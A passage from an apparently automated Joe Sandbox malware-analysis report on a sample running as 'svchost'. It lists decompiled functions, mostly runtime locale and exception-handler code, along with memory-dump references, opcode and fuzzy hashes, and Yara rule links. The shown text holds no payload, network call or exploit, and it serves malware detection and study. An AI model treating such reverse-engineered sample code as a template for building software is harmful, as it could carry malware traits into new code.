    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: abacf81991ee6cdd2aa859963d4d40b6d9b9a005150fb8392a3705d6d02220e4
    • Instruction ID: 1931214a01cf809b86cbd954aa5dd80c86a443ca49725a59049e247e36fa95d6
    • Opcode Fuzzy Hash: abacf81991ee6cdd2aa859963d4d40b6d9b9a005150fb8392a3705d6d02220e4
    • Instruction Fuzzy Hash: 07A2439648EBC25FE71787B05C7A6907FB09E23228B1E45DBC4C1CB0E3E58D095AD726
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047E7DC Relevance: 1.5, APIs: 1, Instructions: 37COMMON
    Download Yara Rule
    C-Code - Quality: 84%
    			E0047E7DC(void* __eflags) {
				void* _t6;
				void* _t10;
				signed char _t16;

				_t6 = E00473450( *0x4e1b24);
				asm("sbb eax, eax");
				 *0x4e1b20 =  ~(_t6 - 3) + 1;
				_t10 = E00473450( *0x4e1b28);
				asm("sbb eax, eax");
				 *0x4e1b14 =  *0x4e1b14 & 0x00000000;
				 *0x4e1b18 =  ~(_t10 - 3) + 1;
				if( *0x4e1b20 == 0) {
					 *0x4e1b1c = E0047EE8D( *0x4e1b24);
				} else {
					 *0x4e1b1c = 2;
				}
				EnumSystemLocalesA(E0047E863, 1);
				_t16 =  *0x4e1b2c; // 0x0
				if((_t16 & 0x00000001) == 0 || (_t16 & 0x00000002) == 0 || (_t16 & 0x00000007) == 0) {
					 *0x4e1b2c =  *0x4e1b2c & 0x00000000;
					return _t16;
				}
				return _t16;
			}






    0x0047e7e2
    0x0047e7f2
    0x0047e7f5
    0x0047e7fa
    0x0047e805
    0x0047e807
    0x0047e817
    0x0047e81c
    0x0047e836
    0x0047e81e
    0x0047e81e
    0x0047e81e
    0x0047e842
    0x0047e848
    0x0047e850
    0x0047e85b
    0x00000000
    0x0047e85b
    0x0047e862

    APIs
    • EnumSystemLocalesA.KERNEL32(0047E863,00000001,004BC044,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047E842
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: EnumLocalesSystem
    • String ID:
    • API String ID: 2099609381-0
    • Opcode ID: fd1bf86a2ed01bc2ee5372915fa2861664bba7089b2b59882edf4803f1b6b2ac
    • Instruction ID: 00051f333b0c17771e17eddc52cab3adcdca6b01a5430ad816285b868c9eb7ac
    • Opcode Fuzzy Hash: fd1bf86a2ed01bc2ee5372915fa2861664bba7089b2b59882edf4803f1b6b2ac
    • Instruction Fuzzy Hash: 25F08135690141CED700AF36ED89B9436A0A718319F01877AE408AE2F2E77C2489CB0E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047EA67 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
    Download Yara Rule
    C-Code - Quality: 89%
    			E0047EA67(void* __eflags) {
				void* _t2;
				intOrPtr _t5;
				int _t7;

				_t2 = E00473450( *0x4e1b24);
				asm("sbb eax, eax");
				_t5 =  ~(_t2 - 3) + 1;
				 *0x4e1b20 = _t5;
				if(_t5 == 0) {
					 *0x4e1b1c = E0047EE8D( *0x4e1b24);
				} else {
					 *0x4e1b1c = 2;
				}
				_t7 = EnumSystemLocalesA(E0047EABD, 1);
				if(( *0x4e1b2c & 0x00000004) == 0) {
					 *0x4e1b2c =  *0x4e1b2c & 0x00000000;
					return _t7;
				}
				return _t7;
			}






    0x0047ea6d
    0x0047ea78
    0x0047ea7a
    0x0047ea7b
    0x0047ea80
    0x0047ea9a
    0x0047ea82
    0x0047ea82
    0x0047ea82
    0x0047eaa6
    0x0047eab3
    0x0047eab5
    0x00000000
    0x0047eab5
    0x0047eabc

    APIs
    • EnumSystemLocalesA.KERNEL32(0047EABD,00000001,?,004BC044,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047EAA6
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: EnumLocalesSystem
    • String ID:
    • API String ID: 2099609381-0
    • Opcode ID: ed192c1ba65fd947763ad43fc84015756ca6024c555377b289476dc1ce797b6c
    • Instruction ID: 7d65c2b94c3acb7d22b4a64490c5259b07d6b21146a4eee694a58a948ab7075f
    • Opcode Fuzzy Hash: ed192c1ba65fd947763ad43fc84015756ca6024c555377b289476dc1ce797b6c
    • Instruction Fuzzy Hash: 5EE0E5796902919ED7119F32AC89BA03BA1B31C709F40837AE5088D5F6E7781549CF4C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047EB7A Relevance: 1.5, APIs: 1, Instructions: 15COMMON
    Download Yara Rule
    C-Code - Quality: 84%
    			E0047EB7A(void* __eflags) {
				void* _t2;
				int _t6;

				_t2 = E00473450( *0x4e1b28);
				asm("sbb eax, eax");
				 *0x4e1b18 =  ~(_t2 - 3) + 1;
				_t6 = EnumSystemLocalesA(E0047EBB1, 1);
				if(( *0x4e1b2c & 0x00000004) == 0) {
					 *0x4e1b2c =  *0x4e1b2c & 0x00000000;
					return _t6;
				}
				return _t6;
			}





    0x0047eb80
    0x0047eb8b
    0x0047eb95
    0x0047eb9a
    0x0047eba7
    0x0047eba9
    0x00000000
    0x0047eba9
    0x0047ebb0

    APIs
    • EnumSystemLocalesA.KERNEL32(0047EBB1,00000001,004BC0C8,?,004BC044,0047A878,?,004E19C0,?,?,004B880C,00000000), ref: 0047EB9A
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: EnumLocalesSystem
    • String ID:
    • API String ID: 2099609381-0
    • Opcode ID: 6a6323f570c806c03a69d8be73c6ee0f4a74aef716cecf5f202ff9f4b54526f4
    • Instruction ID: 94a2102d8f5aa9130b03b6bae85187c0e502060eb56934eae80f96fda575138e
    • Opcode Fuzzy Hash: 6a6323f570c806c03a69d8be73c6ee0f4a74aef716cecf5f202ff9f4b54526f4
    • Instruction Fuzzy Hash: 5BD05E756902809ED7008F32AC49B603A90A318B19F5086BAE905881F3E2B92688CE4C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047C0EC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
    Download Yara Rule
    APIs
    • SetUnhandledExceptionFilter.KERNEL32 ref: 0047C0F1
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: 7e15a8b32ff1e17c7da5f692edfbc01bb51ee740afd90081156ff258ac735aa7
    • Instruction ID: 58141c03e404777b24acf40258f1ceab2e6082131e66a865291a6314e33ddac8
    • Opcode Fuzzy Hash: 7e15a8b32ff1e17c7da5f692edfbc01bb51ee740afd90081156ff258ac735aa7
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00466C7E Relevance: .5, Instructions: 514COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0e0ae97ba6bee48522cf6a84d4d38360e013f1b0ae002f2c9fa666aa5ec8d4c1
    • Instruction ID: 4416fb302bd780838c92aa11413c43dfffc4f3392cff822a1fa706977c50af07
    • Opcode Fuzzy Hash: 0e0ae97ba6bee48522cf6a84d4d38360e013f1b0ae002f2c9fa666aa5ec8d4c1
    • Instruction Fuzzy Hash: 241250B16087018FCB18CF19D99062BBBE6EBC9304F15896EE889CB345E774DC45CB96
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00466ECE Relevance: .5, Instructions: 514COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 33a23ec732da9fb40a185b4eed5ece97a349a83c6d80b035494cbc5c0868b739
    • Instruction ID: 5176edb1852c9b0e96117814e5b528a86063aae7024c4964ec079eb19fdda6c2
    • Opcode Fuzzy Hash: 33a23ec732da9fb40a185b4eed5ece97a349a83c6d80b035494cbc5c0868b739
    • Instruction Fuzzy Hash: FB1250B16087018FCB18CF19D99062BBBE6EBC9304F15896EE889CB345E774DC45CB96
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004520B0 Relevance: .4, Instructions: 386COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 53b3f88cdecfd161848c40ac68c254e1f7cff70da81a5f5c78c40c135ae89574
    • Instruction ID: 9656f85adc961465b66369f0cb2b6a2eff9fb191086158373f291d78b2580c46
    • Opcode Fuzzy Hash: 53b3f88cdecfd161848c40ac68c254e1f7cff70da81a5f5c78c40c135ae89574
    • Instruction Fuzzy Hash: 3EC1322560A6924FDB198A6C94E92BBBFD1DB6B311B0881FFDDC5CB323C565840EC354
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004527B0 Relevance: .4, Instructions: 382COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: bd7d6e5bdf9180fc249a7cdffd82ac3d4432134ef2b1545fd9ebd85a9bab015f
    • Instruction ID: 3b5ab67c06262ad7a101bc49bce7f6c055a9774a757496cf9847425f6274602e
    • Opcode Fuzzy Hash: bd7d6e5bdf9180fc249a7cdffd82ac3d4432134ef2b1545fd9ebd85a9bab015f
    • Instruction Fuzzy Hash: 8DD1C66150D6D24BD722CE2885A03A6FFD1AFA7305F188ADFD8C44F343D2A6990DC356
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00450B90 Relevance: .4, Instructions: 364COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: dcdb0e9a48f9cc5b8454a5ea312c92bd26660b050e477f45892fe8a81102f325
    • Instruction ID: af08ebb05414776d5e53561ee3afdc267b35584e06cebba72db5f7bc146b2750
    • Opcode Fuzzy Hash: dcdb0e9a48f9cc5b8454a5ea312c92bd26660b050e477f45892fe8a81102f325
    • Instruction Fuzzy Hash: AAD1B43560D7828FC325CF29C4912A7FBE1EF9A304F48856DE8D99B752D234D80ACB55
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004645F0 Relevance: .3, Instructions: 346COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 7c84515c638c63e4fe69de43caeaa1b4b7f9488a9b0e7ec9114424ae6e0b3906
    • Instruction ID: d03c98dc8f4421056e21e36197df4e44f6003633d23668913cdfc5373a703850
    • Opcode Fuzzy Hash: 7c84515c638c63e4fe69de43caeaa1b4b7f9488a9b0e7ec9114424ae6e0b3906
    • Instruction Fuzzy Hash: 57D12675204B418FD724CF29C980AA7B7E5FF89308B18492ED8D687B51EB39F846CB45
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00458D70 Relevance: .3, Instructions: 346COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e0a63bb2cad0d03da99ae37a7cafd4555ab2635092ef7e12ae5d440ffd4bb82f
    • Instruction ID: 09a4d2990106f6263b19ee0bb5d8e8ede74ff95f82281fbe411837f67485b090
    • Opcode Fuzzy Hash: e0a63bb2cad0d03da99ae37a7cafd4555ab2635092ef7e12ae5d440ffd4bb82f
    • Instruction Fuzzy Hash: 7DD12675200B418FD324CF29C980AA7B7E6FF89304B18892ED8D687B52DB35F849CB44
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004684F0 Relevance: .3, Instructions: 321COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 44dc9b3f848b861922e0aa16c27fab3ea16433a1379b6acb80e44ff1c9d73b6c
    • Instruction ID: a4d976059cbdf699ac0c90c8ff984a592dc19429bf2528d4fd2d5d3f93817af3
    • Opcode Fuzzy Hash: 44dc9b3f848b861922e0aa16c27fab3ea16433a1379b6acb80e44ff1c9d73b6c
    • Instruction Fuzzy Hash: 4F91B5723406082FE728A9358C13B7F7689EBC1729F05072EBA179B7C5EEF55D009299
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004661F0 Relevance: .3, Instructions: 295COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
